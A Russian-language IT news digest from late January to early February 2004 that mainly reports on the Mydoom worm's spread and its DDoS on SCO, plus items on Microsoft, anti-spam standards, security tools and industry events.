Сайт американского производителя программного обеспечения, компании SCO, подвергся атаке, организованной интернет-червем Mydoom, сообщает сайт газеты The Washington Post. Инцидент произошел за несколько дней до даты, на которую создатели следующей версии Mydoom запланировали атаку на сайт Microsoft. Количество обращений к сайту SCO начало расти вечером 31 января, а уже в первые часы 1 февраля ресурс оказался недоступным. Согласно заданиям, прописанным в коде Mydoom, DDoS-атака будет продолжаться до 12 февраля. 2 февраля представители SCO намереваются предложить своим клиентам резервный план по обеспечению доступа к сайту. Вероятнее всего, под планом подразумевается незначительное изменение адреса ресурса. В SCO полагают, что состоявшаяся атака не повлияет на деловую активность компании: «По нашему мнению, люди не приходят на сайт для заключения сделок. Здесь им необходима информация и, возможно, некоторые обновления программного обеспечения»
Источник - http://www.viruslist.ru

2/02/2004 11:57 Microsoft обвинили в сотрудничестве с китайскими спецслужбами.
Американская компания Microsoft обвинена в способствовании введению цензуры в интернете, нарушении прав человека, а также пособничестве китайским спецслужбам, сообщает The Observer. Эти обвинения содержатся в докладе правозащитной организации "Международная амнистия" (Amnesty International), опубликованном в воскресенье. В докладе утверждается, что компания продала китайскому правительству ряд программных технологий, которые используются спецслужбами Китая для отслеживания инакомыслящих интернет-пользователей. Авторы доклада также приводят информацию о большом количестве китайских диссидентов, отловленных и посаженных в тюрьму благодаря ПО Microsoft. Представители организации полагают, что компания Билла Гейтса нарушает соответствующие статьи кодекса ООН о правах человека ("товары и услуги торговых организаций не должны быть направлены на ущемление прав человека"), и предостерегает прочих производителей программного обеспечения от сотрудничества с китайскими властями.
Подробности - http://observer.guardian.co.uk/print/0,3858,4849043-102271,00.html

1/02/2004 14:12 Cтатья "Осваиваем Nagios".
Очередной инетересной статьёй порадовал Андрей Бешков, ака tigrisha. Cама статья была опубликована в журнале "Системный администратор" и посвящена продвинутым приемам работы с Nagios в ОС FreeBSD.
Cтатья - http://onix.opennet.ru/monitoring/nagios_osvaiv.html

1/02/2004 13:56 Диагностика проблем почтового сервера на базе Postfix
На сайте onlamp.com опубликована довольно полезная статья, ссылка на которую обнаружена на opennet.ru. В статье "Troubleshooting with Postfix Logs" даются рекомендации по определению проблем работы определенных подсистем postfix через анализ логов. Например, при тестировании блокировок удобно использовать "soft_bounce = yes" или префикс "warn_if_reject", что приводит к выводу 4xx кодов ошибок (не фатальные) вместо 5xx.
Статья - http://www.onlamp.com/pub/a/onlamp/2004/01/22/postfix.html

1/02/2004 12:52 Очередная газетная страшилка на тему "Конца Интернета".
На сайе gazeta.ru появилась статья под названием "Интернет закончится в воскресенье", автором которой значится Наталья Павлова. О компетенции автора в данном вопросе можно судить хотя бы по такой фразе (привожу полностью и без купюр): "Со всех зараженных компьютеров в мире на сайт компании SPO Group (один из разработчиков системы Unix) посыплются сообщения с запросами на обслуживание. По прогнозам, сайт должен рухнуть и не функционировать до 12 февраля, когда атака прекратится". Кстати, сайт www.sco.com таки, похоже подвергся массированной DDoS-атаке и на настоящий момент на запросы не отвечает. Так вот - о статье. В ней приводится поверхностная информация о самом черве novarg, зато в изобилии наличествуют различные голословные утверждения, наподобие следующего: "Исходя из того, что атаке червя поддаются только машины, использующие операционную систему Windows, можно предположить, что злоумышленники – сторонники «бесплатной» операционной системы Linux (ее коды открыты), фанаты которой презирают Microsoft за то, что она богата и не раскрывает своих кодов". И далее: "То же теперь можно сказать про отношение безумных компьютерных гениев к Unix: компания SCO попыталась предъявить права на некоторые части Linux, и хотя из этого у нее ничего не вышло, хакеры очень обиделись на Unix". Странно, почему же тогда для ОС, исходные тексты которой полностью открыты написаны единицы вирусов и троянов? Хотелось бы посоветовать господам журналистам, прежде чем о чём-то писать иметь хотя бы приблизительное представление о предмете статьи, а не тупо пересказывать различные слухи и домыслы.
Статья - http://www.gazeta.ru/2004/01/30/oa_110741.shtml

1/02/2004 12:28 11000 хайтек-преступлений.
В 2003 году в России выявлено около 11 тысяч преступлений в сфере высоких технологий, из которых 90% доведены до суда. На конференции «Инфофорум» об этом рассказывали представители МВД и ФСБ. Как сообщает ИТАР-ТАСС со ссылкой на начальника Главного управления специальных технических мероприятий МВД РФ Бориса Мирошникова, число преступлений в сфере высоких технологий ежегодно увеличивается почти в два раза. «Если в 2002 году в этой области было зарегистрировано около 6 тыс преступлений, то в 2003 году их было выявлено уже порядка 11 тысяч», — отметил Мирошников. При этом противоправные действия в этой области отличаются высокой технологичностью и разнообразием. В то же время в три раза выросли преступления, касающиеся разглашения коммерческой тайны. На 39% увеличилось количество преступлений в сфере телекоммуникаций. «Преступники, в частности, клонируют SIM-карты для мобильных телефонов, представляют незаконные услуги связи», — пояснил начальник Главного управления специальных технических мероприятий МВД. Для борьбы с такими преступлениями практически в каждом региональном подразделении МВД созданы специальные отделения, которые налаживают взаимодействие и с зарубежными коллегами для противодействия транснациональной преступности в сфере высоких технологий.
Источник - http://www.tass.ru/

1/02/2004 12:05 Интернет-инженеры планируют атаку на спам.
Многие спаммеры используют фальшивые адреса, симулируя отправку писем с доменов типа Hotmail.com. Такая уловка позволяет письмам избегать фильтров против спама и увеличивает вероятность открытия письма пользователем. Чтобы остановить поток спама, протоколы передачи почты должны позволять проверку подлинности адреса отправителя. Anti-Spam Research Group (ASRG), входящая в группу Internet Research Task Force (IRTF), в настоящее время работает над новыми техническими стандартами, которые позволят это сделать. Существенное требование к разрабатываемым методам — их применение не должно привести к изменениям SMTP и емейл-серверов, которые используют этот протокол, поскольку это стало бы огромной и дорогостоящей задачей. Первый способ, исследуемый ASRG, предполагает модификацию системы доменных имен (DNS) для опознавания компьютеров, работающих в качестве почтовых серверов. Обычно серверы DNS только привязывают имя сайта, например webplanet.ru к числовому IP-адресу его сервера (в данном случае 217.16.16.50). Но можно заставить их публиковать IP-адреса емейл-серверов, используемых каждым доменом. Таким образом, станет возможным проверить, действительно ли сообщение прибыло из указанного домена. На рассмотрение группы есть три варианта реализации этой технологии, лишь немного отличающихся друг от друга. Второе предложение также предполагает прослеживание пути сообщений к серверам доменов, но для связи двух серверов используются криптографические ключи. Каждому домену соответствует свой ключ, при помощи которого проверяется подлинность сообщения. ASRG рассматривает два варианта реализации этой схемы.
Подробности - http://www.webplanet.ru/news/internet/2004/1/30/asrg.html

1/02/2004 11:23 20 000 американских студентов рискуют стать жертвами онлайновых мошенников.
Администрация университета Джорджии заявила, что хакеры получили доступ к ключевой информации двадцати тысяч учащихся, включая номера их кредиток и карт социального страхования. Предупреждение о чрезвычайной ситуации было вызвано следующими фактами. Технические специалисты обнаружили, что взломщики использовали компьютерную сеть вуза для сканирования и исследования других систем в Интернете на предмет возможных атак. Пока никаких признаков кражи личной информации не найдено. Тем не менее, опасность существует, поэтому власти учебного заведения не исключают возможность будущего преступления. Сообщается, что хакеры получили доступ к таким сведениям, как имена, даты рождения, номера карточек социального обеспечения, информация о родителях, номера кредиток, а также заявления о приеме. По свидетельству InformationWeek.Com , администрация университета попыталась установить контакт со всеми студентами, которые могут стать жертвами мошенников. В помощь учащимся был запущен специальный веб-сайт .
Источник - http://www.runet.ru

1/02/2004 10:14 "Equant" проводит работы на московском узле, - ожидаются перебои с доступом по всей стране.
1 февраля 2004 г. с 2:30 до 3:00 по московскому времени "Equant" проводит планово-профилактические работы на своем московском узле. В связи с этим у операторов, предоставляющих услуги компании в регионах, возможны перерывы в предоставлении следующих сервисов:
1. GIN Dial+
2. GIN Roaming
3. Dial-up доступ из-за границы (Equant IP Dial)
4. GIN Dial Intranet
5. GPRS Access пользователи услуги Equant Secure Authetication
Источник - http://www.provider.net.ru

31/01/2004 20:44 Microsoft выпустил SQL Server 2000 Reporting Services
Microsoft объявила о выпуске пакета SQL Server 2000 Reporting Services, предоставляющего заказчикам возможность анализа деловой информации, поступающей в режиме реального времени из самых разнообразных источников на различные устройства. Данный пакет позволяет расширить доступ к данным и принимать более обоснованные решения, повышая эффективность работы организации в целом. Появление в SQL Server служб создания отчетов Reporting Services превращает данное решение, входящее в состав Microsoft® Windows Server System™, во всеобъемлющую платформу интеллектуального обеспечения бизнеса (Business Intelligence), снабженную средствами аналитической обработки данных в реальном времени (OLAP), разработки данных (data mining), организации хранилищ информации (data warehousing), средствами извлечения, преобразования и загрузки данных (ETL), а также функциями создания отчетов. Подобный всеобъемлющий комплексный подход поможет корпоративным заказчикам принимать более быстрые и обоснованные решения, а также сократить совокупную стоимость владения информационными системами.
Источник - http://www.cnews.ru

31/01/2004 20:11 О настройке SquirrelMail + GPG по-русски.
Благодаря linux.org.ru получена довольно полезная ссылка, которая представляет собой небольшую статью о том, как настроить версию веб-почты SquirrelMail 1.4.2+ для работы с русскоязычным интерфейсом в разных кодировках и подключить к ней свеженаписанный модуль шифрования GPG.
Подробности - http://byak.sinp.msu.ru/squirrelmail/index.html

31/01/2004 19:07 Компьютерщик получил срок за съедение веб-сёрфера.
В Германии осужден специалист по компьютерам, признавшийся в том, что он убил и съел человека, с которым познакомился через интернет. Техник-компьютерщик (от мне нравится подобное название профессии - прим. ньюсмейкера, прям как слесарь-дальнобойщик) получил восемь с половиной лет тюремного заключения за убийство и каннибализм: он признался, что убил и съел «психически ненормального» добровольца. 42-летний житель Ротенбурга Армин Майвес поместил в интернет объявление для парня 18-25 лет. Назвавшись Фрэнки, он написал: «Приди ко мне, я съем твою вкусную плоть». Следователи выяснили, что Майвес установил контакт с сотнями добровольцев, но в конце концов остановился на 43-летнем Бернде-Юргене Б., тоже компьютерщике. В процессе следствия Майвес рассказал суду, что в марте 2001 года он разрезал свою жертву на куски при помощи циркулярной пилы, мясо (которое потом постепенно за несколько месяцев съел) заморозил, а кости закопал в саду. Прокуроры не стали предъявлять обвинение в убийстве, так как суд принял во внимание тот факт, что Юрген Б. сам пожелал стать жертвой. Судья Фолкер Мютзе сказал, что хотя Майвес не совершил убийство, он виновен в деяниях, «порицаемых в нашем обществе». Майвес записал то, что произошло, на видео, и эта запись демонстрировалась на закрытом заседании суда. Он не может быть досрочно освобожден за хорошее поведение.
http://news.zdnet.co.uk/business/legal/0,39020651,39145104,00.htm

31/01/2004 18:54 Сотрудник Microsoft получил 21 месяц тюрьмы за кражу ПО
Бывший сотрудник Microsoft получил 2 месяца тюрьмы за кражу программного обеспечения, сообщает Reuters. 36-летний Уилсон Деланси был также приговорен к выплате штрафа в размере 4 миллиона долларов в качестве компенсации ущерба, нанесенного Microsoft. Деланси был признан виновным в незаконной продаже ПО Microsoft коммерческим компаниям. С помощью своего пособника, бывшей сотрудницы Microsoft Кори Робин Браун, Деланси организовывал фиктивные благотворительные фонды. Этим фондам Браун продавала ПО Microsoft (в частности несколько копий пакета SQL Server) по низким ценам. Полученное ПО затем перепродавалось третьим лицам. За незаконную продажу ПО, с использованием специальных предложений для благотворительных организаций, Браун была ранее осуждена на 17 месяцев тюремного заключения. И Браун и Деланси были признаны виновным в мошенничестве. Деятельность мошенников была раскрыта в ходе внутренней проверки, проведенной компанией Microsoft в прошлом году.
Подробности - http://www.reuters.co.uk/newsArticle.jhtml?type=technologyNews&storyID=4234017&section=news

30/01/2004 21:50 О безопасности Live Journal.
Если вы внимательно читали наши новости, то наверняка должны были заметить информацию о массовом взлома многих так называемых ЖЖ (они же Live Journal). Господин Анатолий Воробьёв решил просветить широкую общественность об основных принципах безопасности при ведении ЖЖ. В статье рассказывается о паролях, адресах, и о том, как восстановить контроль над своим дневником в случае взлома. Для кого актуально - почитайте. Наверняка будут небезынтересны отзывы о сатье.
Подробности - http://www.livejournal.com/users/avva/1084134.html

30/01/2004 21:24 «Собака» @ удобна мошенникам и будет запрещена.
В готовящемся обновлении для браузера Internet Explorer будет запрещено использование знака @ в веб-адресах. Применение этого знака в URL позволяет мошенникам скрывать настоящий адрес сайта, на который направляется пользователь: тому видна только часть URL до знака @, которая не имеет ничего общего с реальным направлением. Такой вид мошенничества используется и для получения личной информации о пользователе, в том числе, о номере его кредитной карты. Например, владельцу банковского счета присылается уведомление о необходимости внести некоторые изменения в свои данные на банковском сайте, а к письму прилагается ссылка. При открытии этой ссылки пользователь попадает на сайт мошенников, копирующий интерфейс оригинального ресурса. Введенная там личная информация приводит зачастую к крупным финансовым потерям. Изначально знак @ в интернет-адресе предназначался для отправки имени пользователя на ресурс: имя пользователя вводилось до знака @, а после него - сам адрес сайта. Несмотря на удобство такой технологии авторизации ее весьма активно применяют интернет-мошенники. Они, к тому же, научились скрывать информацию после знака @, используя обнаруженную некторое время назад дыру в браузере Internet Explorer.
Источник - http://www.oxpaha.ru

30/01/2004 21:13 Статья "Старый взгляд на новые вещи".
На сайте Дмитрия Леонова www.bugtraq.ru в рамках конкурса "BugTraq 3/4" опубликована статья noonv. Статья посвящена вопросам генерации случайных чисел. Математикам статья вряд ли будет интересна, но вот разработчикам операционных систем и программистам - может быть полезна. Как известно, в основе так называемой ISN (Initial Sequence Number), алгоритм формирования которой является краеугольным камнем системы криптозащиты TCP-соединений, тоже лежит алгоритм формирования случайных чисел. В конце концов, чем сложнее предположить номер следующей TCP-последовательности, тем защищённее считается сетевой стэк операционной системы. Если вспомнить историю, то как раз слабый алгоритм формирования ISN лежал в основе взлома компьютера Шимомуры, осуществлённый небезызвестным Кевином Митником.
Статья - http://www.bugtraq.ru/library/programming/oldview.html

30/01/2004 20:57 Microsoft выпустила обновление для Word 2003.
Компания Microsoft выпустила 27 января обновление для текстового процессора Word 2003, сообщает "Компьюлента". Оно вышло вне избранного Microsoft графика выпуска обновлений и не связано с безопасностью. Новый патч устраняет проблему с зависанием или "падением" Word при попытке сохранить, распечатать или даже закрыть документ. Проблема может наблюдаться и при срабатывании функции автоматического сохранения. Причина ошибки заключается в некорректной работе Word при фоновом сохранении документа, содержащего объекты, внедренные по технологии OLE. О проблеме рассказывается в статье базы знаний Microsoft за номером 832858. Для устранения ошибки рекомендуется установить выпущенную компанией заплатку. Если же это по каким-то причинам невозможно, то в Microsoft рекомендуют запретить фоновое сохранение документов. Информацию о выпущенном патче можно почерпнуть в статье базы знаний номер 830000. Помимо вышеописанной проблемы в ней устраняются и другие ошибки. Среди них исчезновение кусков текста при изменении режима просмотра документа или его прокрутке, некоторые ошибки при нумерации и перенумерации страниц, ошибки при обработке вложений в формате RTF при использовании Word в качестве редактора электронной почты и другие. Обновление для Word 2003 можно скачать с сайта Office Online или через службу автоматического обновления Office. Размер патча чуть менее 1,5 Мб.
Подробности - http://support.microsoft.com/?kbid=830000

30/01/2004 20:31 Microsoft опять обвиняют в присвоении чужих разработок.
В США началось очередное судебное разбирательство по делу о нарушении авторских прав компанией Microsoft. В этот раз истцом стала компания Research Corporation Technologies (RCT), по мнению руководства которой, в операционной системе Microsoft Windows и офисном пакете MS Office незаконно используются технологии, патенты на которые принадлежат RCT. Как сообщается на сайте PC World, соответствующий иск был подан еще в декабре 2001 года. На этой неделе федеральный судья Уильям Браунинг подтвердил законность требований RCT: было признано, что компания доказала свои права на четыре патента, в то время как Microsoft не представила существенных аргументов в свою пользу. Теперь RCT сможет продолжить разбирательство в суде. Спорная технология была разработана в Университете штата Нью-Йорк в Рочестерe при содействии RCT, которая позже получила права на разработку. Технология описывает метод создания полутонов при представлении графических изображений в цифровом виде (на мониторе и печати). Аналогичные иски RCT к компаниям HP и Lexmark были удовлетворены: эти компании, равно как и Seiko Epson, лицензируют данную технологию у правообладателя. Между тем, в Microsoft утверждают, что ничьих патентов они не нарушали. Представитель софтверного гиганта заявил, что Microsoft приложит все усилия к тому, чтобы доказать незаконность получения компанией RCT спорных патентов.
Подробности - http://story.news.yahoo.com/news?tmpl=story...

30/01/2004 20:09 Автор знаменитой комбинации из трех кнопок ушел из IBM.
Американский прогарммист Дэвид Брэдли, который знаменит на весь мир тем, что изобрел комбинацию Ctrl-Alt-Del, уволился со своей работы в компании IBM, сообщает USA Today. Он проработал на своем месте 28 с половиной лет. В свое время программисту потребовалось всего пять минут, чтобы написать код, перезагружающий компьютер после нажатия этой комбинации клавиш. Она стала, по мнению USA Today, настоящим культурным символом последних десятков лет. До сих пор производители компьютеров и программного обеспечения пользуются этой комбинацией для того, чтобы перезагружать компьютеры. Бредли написал за свою жизнь множество программ, но лишь самая маленькая из них сделала его настолько знаменитым, что на праздновании 20-летия компании он вышел на сцену вместе с Биллом Гейтсом. Сам 55-летний Бредли утверждает, что даже не подозревал, что он создает, когда сотрудники IBM попросили его написать какой-нибудь простой код, чтобы исправить проблему зависшего компьютера. "Во всяком случае, хоть я и написал код, именно Билл Гейтс сделал его знаменитым", - заявил программист. Однако скромность не помешала ему в течение 28 лет собирать карикатуры, в которых обыгрывалась бы комбинация клавиш Ctrl-Alt-Del.
Источник - http://www.lenta.ru

30/01/2004 19:51 РосНИИРОС прекращает выполнять функции регистратора
С 01 января 2005 года РосНИИРОС прекращает выполнять функции регистратора доменов второго уровня в домене RU и оставляет за собой только функции технического сопровождения системы регистрации и DNS-серверов зоны RU, а также деятельность по регистрации и технической поддержке доменов третьего уровня в доменах общего пользования ORG.RU, NET.RU, PP.RU, COM.RU. В связи с этим с 01 января 2005 года будет прекращено действие всех договоров "О регистрации и технической поддержке доменов второго уровня в зоне .RU", заключенных РосНИИРОС с организациями и физическими лицами. После прекращения действия договора "О регистрации и технической поддержке доменов второго уровня в зоне .RU" станет невозможным продление на следующий срок регистрации доменов, зарегистрированных в РосНИИРОС. Для дальнейшего обслуживания и оплаты продления регистрации доменов необходимо передать поддержку доменов одному из действующих регистраторов.
Подробности - http://www.ripn.net:8080/nic/dns/agreem_term.html

30/01/2004 19:28 Microsoft обещает $250,000 за голову автора MyDoom.B
Корпорацией Microsoft объявлено о награде в 250 тыс. долларов.
Она будет выплачена за информацию, необходимую для задержания автора вируса версии MyDoom.B.
(насколько я понимаю, награды SCO и Microsoft не пересекаются - прим. ньюсмейкера)
Источник - http://www.microsoft.com/

29/01/2004 15:02 PalmOS 5.4 готовится к выходу.
Компания PalmSource объявила о выходе пре-релизной версии операционной системы PalmOS 5.4. Новая сборка данной ОС уже доступна для скачивания всем зарегистрированным разработчикам PalmSource. Большинство обновлений в новой версии будет заимствовано в вышедшей только в китайской локализации PalmOS 5.3. Изменения коснутся поддержки языков (английский, французский, итальянский, немецкий, испанский и японский), будет расширена поддержка виртуальной зоны граффити и разрешений экрана 160x160, 160x220, 240x320, 320x320 и 320x480. Сообщается, что все встроенные PIM-приложения будут полностью поддерживать виртуальную зону граффити.
Источник - http://www.mobile-review.com

29/01/2004 14:35 Сайт SCO подвергся DoS-атаке раньше намеченного срока.
Похоже, распределенная DoS-атака на серверы компании SCO произошла даже раньше, чем ее ожидали. Напомним, что в понедельник ведущие антивирусные компании зарегистрировали появление в Сети новой вредоносной программы - MyDoom (она же Novarg и Shimgapi). Этот вирус распространяется с невероятно высокой скоростью, и на текущий момент код червя содержится примерно в каждом двенадцатом электронном письме. Под угрозу попали и пользователи файлобменной службы KaZaA, в которую вирус пытается проникнуть под видом безобидных, на первый взгляд, файлов. Кроме того, MyDoom содержит функцию организации DoS-атаки на серверы компаний SCO и Microsoft. По информации Symantec, атака должна начаться 1 февраля нынешнего года (в ночь с субботы на воскресенье) и завершиться спустя почти две недели - 12 февраля. Однако, статистика, собранная фирмой Netcraft, свидетельствует о том, что проблемы с доступом к онлайновой странице SCO начались еще в минувшее воскресенье. Пингование серверов компании показало, что время ответа в некоторых случаях переваливало за 17 секунд. Более того, в среду ночью сайт SCO и вовсе отказался обслуживать посетителей и был недоступен в течение почти 36 часов. Перебои в работе веб-страницы SCO можно объяснить несколькими основными причинами. Во-первых, со слов независимых экспертов, MyDoom начинает атаку на сайт SCO сразу после проникновения на компьютер, отправляя более 60 фальшивых запросов каждые 300 миллисекунд. Впрочем, данная информация подтверждения не нашла. Во-вторых, сотрудники компании могли преднамеренно отключить свои серверы с целью профилактики и подготовки к февральскому "обстрелу".
Источник - http://www.compulenta.ru

29/01/2004 12:59 Ru-center оценит работу DNS-серверов.
Ru-center запустил новый сервис , позволяющий пользователям оценить качество работы DNS-серверов, cообщает runet.ru. В частности, измеряется время отклика DNS-серверов, ведется статистика их работоспособности, а также оценивается устойчивость работы. В настоящий момент проводится анализ только тех 200 серверов, которые, согласно Рейтингу Top-200 от Ru-center, поддерживают наибольшее число доменов зоны RU. Замеры производятся относительно точки обмена трафиком MSK-IX http://www.msk-ix.ru – самой крупной в российском сегменте Интернета. Программно-аппаратный комплекс оценки времени отклика серверов подключен непосредственно к сетевому оборудованию MSK-IX. В отчетах отражены средние времена откликов серверов, максимальные времена откликов серверов, минимальные времена откликов серверов, а также характеристики изменчивости времени отклика. Обновление данных происходит каждый час.
Сайт проекта - http://stat.nic.ru/

29/01/2004 12:34 В США создана национальная система предупреждения о кибератаках.
Министерство внутренней безопасности США объявило об открытии службы оповещения пользователей компьютеров о новых вирусах, почтовых червях и других опасностях интернета. Служба появилась спустя всего несколько дней после начала крупномасштабной эпидемии червя Mydoom. Впрочем, эти события никак не связаны между собой. Подготовительная работа к созданию службы оповещения велась уже достаточно продолжительное время. Новая служба US-CERT является совместным проектом американских властей и известной организации CERT, специализирующейся на проблемах компьютерной безопасности. Бюллетени, подготовленные в сотрудничестве с CERT, будут публиковаться на сайте US-CERT, а также рассылаться по электронной почте всем желающим. При этом можно будет выбрать вариант бюллетеня: технический с подробным описанием проблем и путей их решения, или пользовательский, понятный для среднестатистических владельцев компьютеров. На сайте также имеются формы, с помощью которых можно сообщить о новых дырах или инцидентах, связанных с компьютерной безопасностью. Главной задачей US-CERT является своевременное информирование пользователей компьютеров о грозящих им опасностях. На данный момент на титульной странице значится 2 бюллетеня по безопасности - TA04-028A, SA04-028A. Оба посвящены нашумевшему червю Mydoom.
Сайт US-CERT - http://www.us-cert.gov/

29/01/2004 11:50 Ещё одна утилита для удаления Mydoom.
Вслед за Panda Software "Лаборатория Касперского" также обновила свою версию утилиты для удаления вирусов/троянов под названием clrav. Утилита CLRAV производит поиск и нейтрализацию червя в оперативной памяти и жестком диске зараженного компьютера, а также восстанавливает оригинальное содержимое системного реестра Windows. Помимо "Novarg" ("Mydoom") данная утилита эффективно борется с другими вредоносными программами, в том числе "Klez", "Lentin", "Opasoft", "Tanatos", "Welchia", "Sobig", "Dumaru", "Swen". CLRAV будет особенно полезен пользователям других антивирусных программ, которые могут некорректно обнаруживать и удалять "Novarg".
Утилита - ftp://ftp.kaspersky.com/utils/clrav.zip

29/01/2004 11:04 Опасная дыра в Internet Explorer.
Сотрудники компании Secunia, специализирующейся на вопросах компьютерной безопасности, предупреждают об обнаружении очередной уязвимости в пакете Microsoft Internet Explorer. Со слов специалистов дыра актуально лишь для последней шестой версии браузера, хотя не исключено, что и более ранние варианты IE также содержат данную ошибку. Суть проблемы сводится к тому, что злоумышленник может поменять имя расположенного на какой-либо веб-страничке исполняемого файла таким образом, что для пользователя он будет выглядеть как обычный текстовый документ. В результате, щелкнув по файлу с расширением, к примеру, .txt или .pdf, посетитель сайта невольно запустит вредоносный код. Ситуация усугубляется еще и потому, что уязвимость может быть использована в комплексе с другой дырой, о которой стало известно еще в декабре. Ошибка, также найденная сотрудниками Secunia, позволяет отобразить в адресной или статусной строке браузера поддельный URL, не соответствующий реальному. То есть, злоумышленник может заманить пользователя на собственный сайт, замаскированный под заслуживающий доверия ресурс, и предложить запустить какой-либо исполняемый файл с расширением текстового документа.
Источник - http://www.secunia.com/advisories/10736/

29/01/2004 10:48 появление новой версии Mydoom.
В продолжение предыдущей темы. "Лаборатория Касперского" сообщает об обнаружении новой версии сетевого червя Mydoom (Novarg) - Mydoom.B. На данный момент уже поступили сообщения о случаях заражения этой вредоносной программой. "Лаборатория Касперского" не исключает, что для распространения Mydoom.b были использованы компьютеры зараженные предыдущей версией червя. По этой причине не исключено, что в ближайшие часы начнется новая вирусная эпидемия, по масштабам многократно превосходящая Mydoom.a. Также, как и предыдущая версия, распространяется через Интернет и пиринговую сеть Kazaa. Червь является приложением Windows (PE EXE-файл), имеет размер 29184 байта, упакован UPX и PE-Patch. Размер распакованного файла около 49KB. Червь активизируется только если пользователь сам откроет архив и запустит зараженный файл (при двойном щелчке на вложении). Затем червь инсталлирует себя в систему и запускает процедуры своего распространения. Червь содержит в себе "бэкдор"-функцию, а также запрограммирован на проведение DoS-атаки на сайты www.microsoft.com и www.sco.com. Часть тела вируса зашифрована. В распакованном файле имеется текстовая строка: "(sync-1.01; andy; I'm just doing my job, nothing personal, sorry)". После старта червь запускает Windows Notepad в котором демонстрирует произвольный набор символов. При инсталляции червь копирует себя с именем "explorer.exe" в системный каталог Windows и регистрирует этот файл в ключе автозапуска системного реестра: [HKLMSoftwareMicrosoftWindowsCurrentVersionRun][HKCUSoftwareMicrosoftWindowsCurrentVersionRun] "Explorer" = "%System%explorer.exe". Червь создает в системном каталоге Windows файл "ctfmon.dll", являющийся "бэкдор"-компонентом (прокси-сервер) и также регистрирует его в системном реестре: [HKCRCLSID{E6FB5E20-DE35-11CF-9C87-00AA005127ED}InProcServer32] "Apartment" = "%SysDir%ctfmon.dll". Таким образом данная DLL будет запускаться как дочерний процесс Explorer.exe.
Более подробно - http://www.viruslist.com/viruslist.html?id=144497704

29/01/2004 10:32 Подробнейший анализ червя Mydoom
Gadi Evron собрал сведения, исходя из листа рассылки, посвящённого исследованиям вирусов/троянов, которые были посвящены недавно появившемуся червю Mydoom (он же - см. предыдущие новости). В частности, приводится чуть ли не побайтовый анализ кода червя с расшифровкой в читаемом виде. Анализ кода был проведён исследователем компьютерной безопасности Nicolas Brulez.
Подробности - http://www.math.org.il/newworm-digest1.txt

28/01/2004 14:21 Вышла 5-я версия pwdump.
Создана 5ая версия утилиты pwdump. В этой версии появилась возможность взлома системного ключа, чтениz данных из конфигурационных файлов (файлов реестра) и многое другое. О появлении новой версии нам сообщил автор - AntonYo. Помимо выполнимого файла также доступны исходники.
Подробности - http://antonyo.nm.ru/releases.html

28/01/2004 14:08 Linux теперь можно запускать в среде Windows 2000/XP.
25 января в рассылке разработчиков ядра Linux (LKML) было объявлено о возможности запуска ядра Linux как отдельного процесса в среде Windows XP. Проект, получивший название Cooperative Linux (сoLinux), не использует аппаратные методы запуска Linux под управлением Windows: открытая ОС работает, как отдельная программа. Для запуска ядра Linux используется специальный драйвер, благодаря которому ядро работает в привигелированном режиме, известном как режим ring 0. Таким образом, coLinux получает полный контроль над аппаратными ресурсами системы и не входит в конфликт с системой безопасности Windows. При этом производительность Linux мало отличается от той ситуации, когда открытая ОС запускается "сама по себе".
Подробнее - http://lkml.org/lkml/2004/1/25/96

28/01/2004 13:45 Ещё одна утилита для удаления червя Mydoom.
Компания CA (Computer Associates International, Inc.) также выпустила утилитку для удаления червя Mydoom из системы.
Утилита - http://www3.ca.com/Files/VirusInformationAndPrevention/clnshimg.zip

28/01/2004 13:30 Novell упрощает разработку веб-сервисов.
Компания Novell объявила о выходе Novell exteNd 5, своего сервисно-ориентированного комплекса разработки приложений, который помогает компаниям быстро спроектировать и разработать веб-сервисы для привлечения новых заказчиков, создания более эффективных партнерских отношений и обеспечения сотрудников ускоренным доступом к бизнес-ресурсам. Novell exteNd на базе XML содержит графические инструменты, позволяющие корпоративным разработчикам интегрировать старые системы и приложения посредством веб-сервисов. Затем эти сервисы можно встроить в бизнес-процессы и доставлять через динамические порталы с минимальным программированием или вообще без него. Благодаря кросс-платформной поддержке отраслевых стандартов и серверов приложений, заказчики могут использовать уже имеющиеся у них системы, отказавшись от традиционного подхода полной замены.
Более подробно - http://www.cnews.ru/newsline/index.shtml?2004/01/28/154311

28/01/2004 12:28 SCO предлагает награду за поимку автора Mydoom.
Компания SCO Group, которая вот уже почти год ведет непримиримую войну с корпорацией IBM и сообществом open source по поводу нарушения копирайта на операционную систему Unix System V, предложила награду за поимку автора червя Mydoom (он же Novarg), сообщает "Компьюлента". Любой, кто предоставит информацию, ведущую к поимке вирусописателя, может рассчитывать на сумму в размере 250 тысяч долларов США. Со слов главы компании Дарла Макбрайда, SCO уже обратилась за помощью в правоохранительные органы и, в том числе, в ФБР. Кроме того, Макбрайд подчеркнул, что в компании догадываются о том, кто мог написать и выпустить в Сеть вирус Mydoom. Каких-либо конкретных имен не прозвучало, однако, скорее всего, речь идет о приверженцах открытого исходного кода, не желающих выплачивать лицензионные отчисления за Linux. Кстати, первая DoS-атака на сайт SCO была проведена еще весной прошлого года. Затем нападение повторилось в августе. И наконец, в третий раз компьютерная система SCO была выведена из строя в декабре, когда лавины фальшивых запросов заблокировали практически всю внутреннюю информационную инфраструктуру компании.
Подробности - http://ir.sco.com/ReleaseDetail.cfm?ReleaseID=127545

28/01/2004 12:04 Утилита для удаления червя Mydoom.A.
Компаниея Panda Software выпущена утилита для удаления червя Mydoom.A (он же - Novarg (F-Secure), W32.Novarg.A@mm (Symantec), Win32.Mydoom.A (CA) and Win32/Shimg (СA). Утилита также устраняет все изменения, внесенные червем в системную конфигурацию. Для получения утилиты необходимо пройти процедуру регистрации на сайте компании.
Подробнее - http://www.pandasoftware.com/download/utilities

28/01/2004 11:41 Бразильские хакеры заявили о своей силе на сайте MIT.
Группа бразильских хакеров Perfect.br в минувшее воскресенье атаковала сайт Массачусетского технологического института, расположенный по адресу http://colony.mit.edu, сообщает сайт Hacker.com.ve. Результатом хакерской атаки стало появление на институтском сайте следующего обращения: «Эй, ребята, мы снова вернулись. На этот раз мы сильны, как никогда... Это наша особенность - мало говорить и много делать».
Подробности - http://www.hacker.com.ve/modules.php?name=News&file=article&sid=536

28/01/2004 11:18 Билл Гейтс планирует справиться со спамом к 2006 году.
